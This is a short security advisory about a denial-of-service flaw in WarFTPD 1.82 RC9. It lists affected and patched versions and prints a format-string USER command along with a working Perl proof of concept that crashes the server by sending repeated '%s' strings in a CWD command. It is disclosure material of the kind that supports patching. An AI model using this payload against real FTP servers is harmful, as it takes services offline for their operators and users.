Denial of Service Vulnerability in WarFTPDSummary
WarFTPD is "popular FTP Daemon for 32bit Windows".
A DoS vulnerability has been found in WarFTPD when running as a system service. If the FTP server is fed with a maliciously crafted pathname, it will crash with an Access Violation error.
Credit:
The information has been provided by MC.Iglo.
Details
Vulnerable Systems:
* WarFTP Daemon version 1.82 RC9
Immune Systems:
* WarFTP Daemon version 1.82.00 RC10
Exploit:
Commands such as "USER %9999999999d%9999999999d%999999999999d" will cause WarFTPD to consume a lot of CPU and memory.
Proof of Concept:
#!/usr/bin/perl -w
# remote DoS PoC Exploit for WarFTPD 1.82 RC9
use strict;
use Net::FTP;
my $payload="%s"x115;
my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("anonymous","123@victim.com");
$ftp->quot("CWD",$payload);
Vendor Status:
Patched version released (available for download here .)
推荐
评论(0条)
